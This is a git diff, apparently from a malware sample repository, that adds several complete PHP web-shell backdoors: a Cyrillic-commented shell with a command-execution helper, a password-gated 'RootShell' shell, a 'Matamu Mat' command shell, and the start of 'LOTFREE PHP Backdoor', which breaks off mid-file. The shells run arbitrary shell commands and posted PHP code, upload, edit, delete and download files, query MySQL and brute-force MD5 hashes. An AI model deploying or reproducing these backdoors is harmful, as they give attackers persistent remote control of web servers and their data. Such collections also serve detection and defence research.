"MATIP type A"; +$port[351] = "MATIP type B"; +$port[363] = "RSVP tunnel"; +$port[366] = "ODMR (On-Demand Mail Relay)"; +$port[371] = "Clearcase"; +$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)"; +$port[389] = "LDAP"; +$port[407] = "Timbuktu"; +$port[427] = "Server Location"; +$port[434] = "Mobile IP"; +$port[443] = "ssl"; +$port[444] = "snpp, Simple Network Paging Protocol"; +$port[445] = "SMB"; +$port[458] = "QuickTime TV/Conferencing"; +$port[468] = "Photuris"; +$port[475] = "tcpnethaspsrv"; +$port[500] = "ISAKMP, pluto"; +$port[511] = "mynet-as"; +$port[512] = "biff, rexec"; +$port[513] = "who, rlogin"; +$port[514] = "syslog, rsh"; +$port[515] = "lp, lpr, line printer"; +$port[517] = "talk"; +$port[520] = "RIP (Routing Information Protocol)"; +$port[521] = "RIPng"; +$port[522] = "ULS"; +$port[531] = "IRC"; +$port[543] = "KLogin, AppleShare over IP"; +$port[545] = "QuickTime"; +$port[548] = "AFP"; +$port[554] = "Real Time Streaming Protocol"; +$port[555] = "phAse Zero"; +$port[563] = "NNTP over SSL"; +$port[575] = "VEMMI"; +$port[581] = "Bundle Discovery Protocol"; +$port[593] = "MS-RPC"; +$port[608] = "SIFT/UFT"; +$port[626] = "Apple ASIA"; +$port[631] = "IPP (Internet Printing Protocol)"; +$port[635] = "RLZ DBase"; +$port[636] = "sldap"; +$port[642] = "EMSD"; +$port[648] = "RRP (NSI Registry Registrar Protocol)"; +$port[655] = "tinc"; +$port[660] = "Apple MacOS Server Admin"; +$port[666] = "Doom"; +$port[674] = "ACAP"; +$port[687] = "AppleShare IP Registry"; +$port[700] = "buddyphone"; +$port[705] = "AgentX for SNMP"; +$port[901] = "swat, realsecure"; +$port[993] = "s-imap"; +$port[995] = "s-pop"; +$port[1024] = "Reserved"; +$port[1025] = "network blackjack"; +$port[1062] = "Veracity"; +$port[1080] = "SOCKS"; +$port[1085] = "WebObjects"; +$port[1227] = "DNS2Go"; +$port[1243] = "SubSeven"; +$port[1338] = "Millennium Worm"; +$port[1352] = "Lotus Notes"; +$port[1381] = "Apple Network License Manager"; +$port[1417] = "Timbuktu Service 1 Port"; +$port[1418] = "Timbuktu Service 2 Port"; +$port[1419] = "Timbuktu Service 3 Port"; +$port[1420] = "Timbuktu Service 4 Port"; +$port[1433] = "Microsoft SQL Server"; +$port[1434] = "Microsoft SQL Monitor"; +$port[1477] = "ms-sna-server"; +$port[1478] = "ms-sna-base"; +$port[1490] = "insitu-conf"; +$port[1494] = "Citrix ICA Protocol"; +$port[1498] = "Watcom-SQL"; +$port[1500] = "VLSI License Manager"; +$port[1503] = "T.120"; +$port[1521] = "Oracle SQL"; +$port[1522] = "Ricardo North America License Manager"; +$port[1524] = "ingres"; +$port[1525] = "prospero"; +$port[1526] = "prospero"; +$port[1527] = "tlisrv"; +$port[1529] = "oracle"; +$port[1547] = "laplink"; +$port[1604] = "Citrix ICA, MS Terminal Server"; +$port[1645] = "RADIUS Authentication"; +$port[1646] = "RADIUS Accounting"; +$port[1680] = "Carbon Copy"; +$port[1701] = "L2TP/LSF"; +$port[1717] = "Convoy"; +$port[1720] = "H.323/Q.931"; +$port[1723] = "PPTP control port"; +$port[1731] = "MSICCP"; +$port[1755] = "Windows Media .asf"; +$port[1758] = "TFTP multicast"; +$port[1761] = "cft-0"; +$port[1762] = "cft-1"; +$port[1763] = "cft-2"; +$port[1764] = "cft-3"; +$port[1765] = "cft-4"; +$port[1766] = "cft-5"; +$port[1767] = "cft-6"; +$port[1808] = "Oracle-VP2"; +$port[1812] = "RADIUS server"; +$port[1813] = "RADIUS accounting"; +$port[1818] = "ETFTP"; +$port[1973] = "DLSw DCAP/DRAP"; +$port[1985] = "HSRP"; +$port[1999] = "Cisco AUTH"; +$port[2001] = "glimpse"; +$port[2049] = "NFS"; +$port[2064] = "distributed.net"; +$port[2065] = "DLSw"; +$port[2066] = "DLSw"; +$port[2106] = "MZAP"; +$port[2140] = "DeepThroat"; +$port[2301] = "Compaq Insight Management Web Agents"; +$port[2327] = "Netscape Conference"; +$port[2336] = "Apple UG Control"; +$port[2427] = "MGCP gateway"; +$port[2504] = "WLBS"; +$port[2535] = "MADCAP"; +$port[2543] = "sip"; +$port[2592] = "netrek"; +$port[2727] = "MGCP call agent"; +$port[2628] = "DICT"; +$port[2998] = "ISS Real Secure Console Service Port"; +$port[3000] = "Firstclass"; +$port[3001] = "Redwood Broker"; +$port[3031] = "Apple AgentVU"; +$port[3128] = "squid"; +$port[3130] = "ICP"; +$port[3150] = "DeepThroat"; +$port[3264] = "ccmail"; +$port[3283] = "Apple NetAssitant"; +$port[3288] = "COPS"; +$port[3305] = "ODETTE"; +$port[3306] = "mySQL"; +$port[3389] = "RDP Protocol (Terminal Server)"; +$port[3521] = "netrek"; +$port[4000] = "icq, command-n-conquer and shell nfm"; +$port[4321] = "rwhois"; +$port[4333] = "mSQL"; +$port[4444] = "KRB524"; +$port[4827] = "HTCP"; +$port[5002] = "radio free ethernet"; +$port[5004] = "RTP"; +$port[5005] = "RTP"; +$port[5010] = "Yahoo! Messenger"; +$port[5050] = "multimedia conference control tool"; +$port[5060] = "SIP"; +$port[5150] = "Ascend Tunnel Management Protocol"; +$port[5190] = "AIM"; +$port[5500] = "securid"; +$port[5501] = "securidprop"; +$port[5423] = "Apple VirtualUser"; +$port[5555] = "Personal Agent"; +$port[5631] = "PCAnywhere data"; +$port[5632] = "PCAnywhere"; +$port[5678] = "Remote Replication Agent Connection"; +$port[5800] = "VNC"; +$port[5801] = "VNC"; +$port[5900] = "VNC"; +$port[5901] = "VNC"; +$port[6000] = "X Windows"; +$port[6112] = "BattleNet"; +$port[6502] = "Netscape Conference"; +$port[6667] = "IRC"; +$port[6670] = "VocalTec Internet Phone, DeepThroat"; +$port[6699] = "napster"; +$port[6776] = "Sub7"; +$port[6970] = "RTP"; +$port[7007] = "MSBD, Windows Media encoder"; +$port[7070] = "RealServer/QuickTime"; +$port[7777] = "cbt"; +$port[7778] = "Unreal"; +$port[7648] = "CU-SeeMe"; +$port[7649] = "CU-SeeMe"; +$port[8000] = "iRDMI/Shoutcast Server"; +$port[8010] = "WinGate 2.1"; +$port[8080] = "HTTP"; +$port[8181] = "HTTP"; +$port[8383] = "IMail WWW"; +$port[8875] = "napster"; +$port[8888] = "napster"; +$port[8889] = "Desktop Data TCP 1"; +$port[8890] = "Desktop Data TCP 2"; +$port[8891] = "Desktop Data TCP 3: NESS application"; +$port[8892] = "Desktop Data TCP 4: FARM product"; +$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application"; +$port[8894] = "Desktop Data TCP 6: COAL application"; +$port[9000] = "CSlistener"; +$port[10008] = "cheese worm"; +$port[11371] = "PGP 5 Keyserver"; +$port[13223] = "PowWow"; +$port[13224] = "PowWow"; +$port[14237] = "Palm"; +$port[14238] = "Palm"; +$port[18888] = "LiquidAudio"; +$port[21157] = "Activision"; +$port[22555] = "Vocaltec Web Conference"; +$port[23213] = "PowWow"; +$port[23214] = "PowWow"; +$port[23456] = "EvilFTP"; +$port[26000] = "Quake"; +$port[27001] = "QuakeWorld"; +$port[27010] = "Half-Life"; +$port[27015] = "Half-Life"; +$port[27960] = "QuakeIII"; +$port[30029] = "AOL Admin"; +$port[31337] = "Back Orifice"; +$port[32777] = "rpc.walld"; +$port[45000] = "Cisco NetRanger postofficed"; +$port[32773] = "rpc bserverd"; +$port[32776] = "rpc.spray"; +$port[32779] = "rpc.cmsd"; +$port[38036] = "timestep"; +$port[40193] = "Novell"; +$port[41524] = "arcserve discovery"; +//////////////////////////////////////////////////////////////////////////////// +////////////////////////////////ÔÓÍÊÖÈÈ///////////////////////////////////////// +/////////////////////////////////////////////////////////////////////////////// +function rep_char($ch,$count) //Ïîâòîðåíèå ñèìâîëà +{ + $res=""; + for($i=0; $i<=$count; ++$i){ + $res.=$ch.""; + } + return $res; +} +function ex($comd) //Âûïîëíåíèå êîìàíäû +{ + $res = ''; + if (!empty($comd)){ + if(function_exists('exec')){ + exec($comd,$res); + $res=implode("\n",$res); + }elseif(function_exists('shell_exec')){ + $res=shell_exec($comd); + }elseif(function_exists('system')){ + ob_start(); + system($comd); + $res=ob_get_contents(); + ob_end_clean(); + }elseif(function_exists('passthru')){ + ob_start(); + passthru($comd); + $res=ob_get_contents(); + ob_end_clean(); + }elseif(is_resource($f=popen($comd,"r"))){ + $res = ""; + while(!feof($f)) { $res.=fread($f,1024); } + pclose($f); + } + } + return $res; +} +function sysinfo() //Âûâîä SYSINFO +{ + global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS; + echo("<b><font face=Verdana size=2> System information:<br><font size=-2> + <hr>"); + echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "): + ("Safe Mode: </b><font color=red>OFF</font><b> ")); + $row_dis_func=explode(', ',$dis_func); + echo ("PHP: </b><font color=blue>".phpversion()."</font><b> "); + echo ("MySQL: </b>"); + if($mysql_stat){ + echo "<font color=green>ON </font><b>"; + } + else { + echo "<font color=red>OFF </font><b>"; + } + echo "cURL: </b>"; + if($curl_on){ + echo "<font color=green>ON</font><b><br>"; + }else + echo "<font color=red>OFF</font><b><br>"; + if ($dis_func!=""){ + echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>"; + } + $uname=ex('uname -a'); + echo "OS: </b><font color=blue>"; + if (empty($uname)){ + echo (php_uname()."</font><br><b>"); + }else + echo $uname."</font><br><b>"; + $id = ex('id'); + echo "SERVER: </b><font color=blue>".$server."</font><br><b>"; + echo "id: </b><font color=blue>"; + if (!empty($id)){ + echo $id."</font><br><b>"; + }else + echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid(). + "</font><br><b>"; + echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>"; + if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){ + echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>"; + } + echo "<hr size=3 color=black>"; + echo "</font></font>"; +} +function read_dir($dir) //÷èòàåì ïàïêó +{ + $d=opendir($dir); + $i=0; + while($r=readdir($d)){ + $res[$i]=$r; + $i++; + } + return $res; +} +function permissions($mode,$file) { //îïðåäåëåíèå ñâîéñòâ + $type=filetype($file); + $perms=$type[0]; + $perms.=($mode & 00400) ? "r" : "-"; + $perms.=($mode & 00200) ? "w" : "-"; + $perms.=($mode & 00100) ? "x" : "-"; + $perms.=($mode & 00040) ? "r" : "-"; + $perms.=($mode & 00020) ? "w" : "-"; + $perms.=($mode & 00010) ? "x" : "-"; + $perms.=($mode & 00004) ? "r" : "-"; + $perms.=($mode & 00002) ? "w" : "-"; + $perms.=($mode & 00001) ? "x" : "-"; + $perms.="(".$mode.")"; + return $perms; +} +function open_file($fil, $m, $d) //Îòêðûòü ôàéë +{ + if (!($fp=fopen($fil,$m))) { + $res="Error opening file!\n"; + }else{ + ob_start(); + readfile($fil); + $res=ob_get_contents(); + ob_end_clean(); + if (!(fclose($fp))){ + $res="ERROR CLOSE"; + } + } + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b> ".$fil." </b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo $res; + echo " \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.au b/PHP/Backdoor.PHP.Agent.au new file mode 100644 index 00000000..74024895 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.au @@ -0,0 +1,588 @@ +<?php +error_reporting(0); //If there is an error, we'll show it, k? + +$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars. + +$me = basename(__FILE__); +$cookiename = "wieeeee"; + + +if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh? +{ + + if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5. + { + $_POST['pass'] = md5($_POST['pass']); + } + + if($_POST['pass'] == $password) + { + setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in + } + reload(); +} + + + +if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password)) +{ + login(); + die(); +} +// +//Do not cross this line! All code placed after this block can't be executed without being logged in! +// + +if(isset($_GET['p']) && $_GET['p'] == "logout") +{ +setcookie ($cookiename, "", time() - 3600); +reload(); +} +if(isset($_GET['dir'])) +{ + chdir($_GET['dir']); +} + + +$pages = array( + 'cmd' => 'Execute Command', + 'eval' => 'Evaluate PHP', + 'mysql' => 'MySQL Query', + 'chmod' => 'Chmod File', + 'phpinfo' => 'PHPinfo', + 'md5' => 'md5 cracker', + 'headers' => 'Show headers', + 'logout' => 'Log out' +); + +//The header, like it? +$header = '<html> +<title>'.getenv("HTTP_HOST").' ~ Shell I</title> +<head> +<style> +td { + font-size: 12px; + font-family: verdana; + color: #33FF00; + background: #000000; +} + +#d { + background: #003000; +} +#f { + background: #003300; +} +#s { + background: #006300; +} +#d:hover +{ + background: #003300; +} +#f:hover +{ + background: #003000; +} +pre { + font-size: 10px; + font-family: verdana; + color: #33FF00; +} +a:hover { +text-decoration: none; +} + + +input,textarea,select { + border-top-width: 1px; + font-weight: bold; + border-left-width: 1px; + font-size: 10px; + border-left-color: #33FF00; + background: #000000; + border-bottom-width: 1px; + border-bottom-color: #33FF00; + color: #33FF00; + border-top-color: #33FF00; + font-family: verdana; + border-right-width: 1px; + border-right-color: #33FF00; +} + +hr { +color: #33FF00; +background-color: #33FF00; +height: 5px; +} + +</style> + +</head> +<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900"> +<table width=100%><td id="header" width=100%> +<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] '; + +foreach($pages as $page => $page_name) +{ + $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] '; + +} +$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>'; +print $header; + +$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>'; + + +// +//Page handling +// +if(isset($_REQUEST['p'])) +{ + switch ($_REQUEST['p']) { + + case 'cmd': //Run command + + print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>"; + if(isset($_REQUEST['command'])) + { + print "<pre>"; + execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that? + } + break; + + + case 'edit': //Edit a fie + if(isset($_POST['editform'])) + { + $f = $_GET['file']; + $fh = fopen($f, 'w') or print "Error while opening file!"; + fwrite($fh, $_POST['editform']) or print "Couldn't save file!"; + fclose($fh); + } + print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">"; + + if(file_exists($_GET['file'])) + { + $rd = file($_GET['file']); + foreach($rd as $l) + { + print htmlspecialchars($l); + } + } + + print "</textarea><input type=submit value=\"Save\"></form>"; + + break; + + case 'delete': //Delete a file + + if(isset($_POST['yes'])) + { + if(unlink($_GET['file'])) + { + print "File deleted successfully."; + } + else + { + print "Couldn't delete file."; + } + } + + + if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes'])) + { + print "Are you sure you want to delete ".$_GET['file']."?<br> + <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST> + <input type=hidden name=yes value=yes> + <input type=submit value=\"Delete\"> + "; + } + + + break; + + + case 'eval': //Evaluate PHP code + + print "<form action=\"".$me."?p=eval\" method=POST> + <textarea cols=60 rows=10 name=\"eval\">"; + if(isset($_POST['eval'])) + { + print htmlspecialchars($_POST['eval']); + } + else + { + print "print \"Yo Momma\";"; + } + print "</textarea><br> + <input type=submit value=\"Eval\"> + </form>"; + + if(isset($_POST['eval'])) + { + print "<h1>Output:</h1>"; + print "<br>"; + eval($_POST['eval']); + } + + break; + + case 'chmod': //Chmod file + + + print "<h1>Under construction!</h1>"; + if(isset($_POST['chmod'])) + { + switch ($_POST['chvalue']){ + case 777: + chmod($_POST['chmod'],0777); + break; + case 644: + chmod($_POST['chmod'],0644); + break; + case 755: + chmod($_POST['chmod'],0755); + break; + } + print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; + } + if(isset($_GET['file'])) + { + $content = urldecode($_GET['file']); + } + else + { + $content = "file/path/please"; + } + + print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod: + <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b> + <select name=\"chvalue\"> +<option value=\"777\">777</option> +<option value=\"644\">644</option> +<option value=\"755\">755</option> +</select><input type=submit value=\"Change\">"; + + break; + + case 'mysql': //MySQL Query + + if(isset($_POST['host'])) + { + $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); + mysql_select_db($_POST['dbase']); + $sql = $_POST['query']; + + + $result = mysql_query($sql); + + } + else + { + print " + This only queries the database, doesn't return data!<br> + <form action=\"".$me."?p=mysql\" method=POST> + <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br> + <b>Username:<br><input type=text name=username value=\"root\" size=10><br> + <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br> + <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br> + + <b>Query:<br></b<textarea name=query></textarea> + <input type=submit value=\"Query database\"> + </form> + "; + + } + + break; + + case 'createdir': + if(mkdir($_GET['crdir'])) + { + print 'Directory created successfully.'; + } + else + { + print 'Couldn\'t create directory'; + } + break; + + + case 'phpinfo': //PHP Info + phpinfo(); + break; + + + case 'rename': + + if(isset($_POST['fileold'])) + { + if(rename($_POST['fileold'],$_POST['filenew'])) + { + print "File renamed."; + } + else + { + print "Couldn't rename file."; + } + + } + if(isset($_GET['file'])) + { + $file = basename(htmlspecialchars($_GET['file'])); + } + else + { + $file = ""; + } + + print "Renaming ".$file." in folder ".realpath('.').".<br> + <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST> + <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br> + <b>To:<br><input type=text name=filenew value=\"\" size=10><br> + <input type=submit value=\"Rename file\"> + </form>"; + break; + + case 'md5': + if(isset($_POST['md5'])) + { + if(!is_numeric($_POST['timelimit'])) + { + $_POST['timelimit'] = 30; + } + set_time_limit($_POST['timelimit']); + if(strlen($_POST['md5']) == 32) + { + + if($_POST['chars'] == "9999") + { + $i = 0; + while($_POST['md5'] != md5($i) && $i != 100000) + { + $i++; + } + } + else + { + for($i = "a"; $i != "zzzzz"; $i++) + { + if(md5($i == $_POST['md5'])) + { + break; + } + } + } + + + if(md5($i) == $_POST['md5']) + { + print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>"; + } + + } + + } + + print "Will bruteforce the md5 + <form action=\"".$me."?p=md5\" method=POST> + <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br> + <b>Characters:</b><br><select name=\"chars\"> + <option value=\"az\">a - zzzzz</option> + <option value=\"9999\">1 - 9999999</option> + </select> + <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br> + <input type=submit value=\"Bruteforce md5\"> + </form><br>*: if set_time_limit is allowed by php.ini"; + break; + + case 'headers': + foreach(getallheaders() as $header => $value) + { + print htmlspecialchars($header . ":" . $value)."<br>"; + + } + break; + } + +} +else //Default page that will be shown when the page isn't found or no page is selected. +{ + + $files = array(); + $directories = array(); + + if(isset($_FILES['uploadedfile']['name'])) +{ + $target_path = realpath('.').'/'; + $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); + + if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { + print "File:". basename( $_FILES['uploadedfile']['name']). + " has been uploaded"; + } else{ + echo "File upload failed!"; + } +} + + + + + + print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>"; + if ($handle = opendir('.')) + { + while (false !== ($file = readdir($handle))) + { + if(is_dir($file)) + { + $directories[] = $file; + } + else + { + $files[] = $file; + } + } + asort($directories); + asort($files); + foreach($directories as $file) + { + print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; + } + + foreach($files as $file) + { + print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; + } + } + else + { + print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>"; + } + + print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\"> +<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" /> +<input type=\"submit\" value=\"Upload File\" /> +</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td> +<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form> +</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td> +</table>"; + + +} + + +function login() +{ + print "<table border=0 width=100% height=100%><td valign=\"middle\"><center> + <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b> + <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\"> + </form>"; +} +function reload() +{ + header("Location: ".basename(__FILE__)); +} + +function get_execution_method() +{ + if(function_exists('passthru')){ $m = "passthru"; } + if(function_exists('exec')){ $m = "exec"; } + if(function_exists('shell_exec')){ $m = "shell_ exec"; } + if(function_exists('system')){ $m = "system"; } + if(!isset($m)) //No method found :-| + { + $m = "Disabled"; + } + return($m); +} + +function execute_command($method,$command) +{ + if($method == "passthru") + { + passthru($command); + } + + elseif($method == "exec") + { + exec($command,$result); + foreach($result as $output) + { + print $output."<br>"; + } + } + + elseif($method == "shell_exec") + { + print shell_exec($command); + } + + elseif($method == "system") + { + system($command); + } + +} + +function perm($file) +{ + if(file_exists($file)) + { + return substr(sprintf('%o', fileperms($file)), -4); + } + else + { + return "????"; + } +} + +function get_color($file) +{ +if(is_writable($file)) { return "green";} +if(!is_writable($file) && is_readable($file)) { return "white";} +if(!is_writable($file) && !is_readable($file)) { return "red";} + + + +} + +function show_dirs($where) +{ + if(ereg("^c:",realpath($where))) + { + $dirparts = explode('\\',realpath($where)); + } + else + { + $dirparts = explode('/',realpath($where)); + } + + + + $i = 0; + $total = ""; + + foreach($dirparts as $part) + { + $p = 0; + $pre = ""; + while($p != $i) + { + $pre .= $dirparts[$p]."/"; + $p++; + + } + $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/"; + $i++; + } + + return "<h2>".$total."</h2><br>"; + +} +print $footer; + +// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-) +exit(); +?> diff --git a/PHP/Backdoor.PHP.Agent.av b/PHP/Backdoor.PHP.Agent.av new file mode 100644 index 00000000..03d16dba --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.av @@ -0,0 +1,146 @@ +<?php + +define('PHPSHELL_VERSION', '1.7'); + +?> + +<html> +<head> +<title> Matamu Mat </title> +</head> +<body> +<hr><br> + +<?php + +if (ini_get('register_globals') != '1') { + /* We'll register the variables as globals: */ + if (!empty($HTTP_POST_VARS)) + extract($HTTP_POST_VARS); + + if (!empty($HTTP_GET_VARS)) + extract($HTTP_GET_VARS); + + if (!empty($HTTP_SERVER_VARS)) + extract($HTTP_SERVER_VARS); +} + +/* First we check if there has been asked for a working directory. */ +if (!empty($work_dir)) { + /* A workdir has been asked for */ + if (!empty($command)) { + if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { + /* We try and match a cd command. */ + if ($regs[1][0] == '/') { + $new_dir = $regs[1]; // 'cd /something/...' + } else { + $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...' + } + if (file_exists($new_dir) && is_dir($new_dir)) { + $work_dir = $new_dir; + } + unset($command); + } + } +} + +if (file_exists($work_dir) && is_dir($work_dir)) { + /* We change directory to that dir: */ + chdir($work_dir); +} + +/* We now update $work_dir to avoid things like '/foo/../bar': */ +$work_dir = exec('pwd'); + +?> + +<form name="myform" action="<?php echo $PHP_SELF ?>" method="post"> +<p>Current working directory: <b> +<?php + +$work_dir_splitted = explode('/', substr($work_dir, 1)); + +echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/'; + +if (!empty($work_dir_splitted[0])) { + $path = ''; + for ($i = 0; $i < count($work_dir_splitted); $i++) { + $path .= '/' . $work_dir_splitted[$i]; + printf('<a href="%s?work_dir=%s">%s</a>/', + $PHP_SELF, urlencode($path), $work_dir_splitted[$i]); + } +} + +?></b></p> +<p>Choose new working directory: +<select name="work_dir" onChange="this.form.submit()"> +<?php +/* Now we make a list of the directories. */ +$dir_handle = opendir($work_dir); +/* Run through all the files and directories to find the dirs. */ +while ($dir = readdir($dir_handle)) { + if (is_dir($dir)) { + if ($dir == '.') { + echo "<option value=\"$work_dir\" selected>Current Directory</option>\n"; + } elseif ($dir == '..') { + /* We have found the parent dir. We must be carefull if the parent + directory is the root directory (/). */ + if (strlen($work_dir) == 1) { + /* work_dir is only 1 charecter - it can only be / There's no + parent directory then. */ + } elseif (strrpos($work_dir, '/') == 0) { + /* The last / in work_dir were the first charecter. + This means that we have a top-level directory + eg. /bin or /home etc... */ + echo "<option value=\"/\">Parent Directory</option>\n"; + } else { + /* We do a little bit of string-manipulation to find the parent + directory... Trust me - it works :-) */ + echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n"; + } + } else { + if ($work_dir == '/') { + echo "<option value=\"$work_dir$dir\">$dir</option>\n"; + } else { + echo "<option value=\"$work_dir/$dir\">$dir</option>\n"; + } + } + } +} +closedir($dir_handle); + +?> + +</select></p> + +<p>Command: <input type="text" name="command" size="60"> +<input name="submit_btn" type="submit" value="Execute Command"></p> + +<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p> +<textarea cols="80" rows="20" readonly> + +<?php +if (!empty($command)) { + if ($stderr) { + $tmpfile = tempnam('/tmp', 'phpshell'); + $command .= " 1> $tmpfile 2>&1; " . + "cat $tmpfile; rm $tmpfile"; + } else if ($command == 'ls') { + /* ls looks much better with ' -F', IMHO. */ + $command .= ' -F'; + } + system($command); +} +?> + +</textarea> +</form> + +<script language="JavaScript" type="text/javascript"> +document.forms[0].command.focus(); +</script> + +<hr> + +</body> +</html> diff --git a/PHP/Backdoor.PHP.Agent.aw b/PHP/Backdoor.PHP.Agent.aw new file mode 100644 index 00000000..7f22af5c --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.aw @@ -0,0 +1,133 @@ +<?php +function good_link($link) +{ + $link=ereg_replace("/+","/",$link); + $link=ereg_replace("/[^/(..)]+/\.\.","/",$link); + $link=ereg_replace("/+","/",$link); + if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2); + if($link=="")$link="."; + return $link; +} + +$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:"."; +$dir=good_link($dir); +$rep=opendir($dir); +chdir($dir); + +if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="") +{ + header("Content-Type: application/octet-stream"); + header("Content-Length: ".filesize($_REQUEST["down"])); + header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"])); + readfile($_REQUEST["down"]); + exit(); +} +?> +<html> +<head><title>LOTFREE PHP Backdoor v1.5</title></head> +<body> +<br> +<?php + echo "Actuellement dans <b>".getcwd()."</b><br>\n"; + echo "<b>dir = '$dir'</b><br>\n"; + echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n"; + + if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="") + { + echo "<pre>\n"; + system($_REQUEST['cmd']); + echo "</pre>\n"; + } + + if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"])) + { + 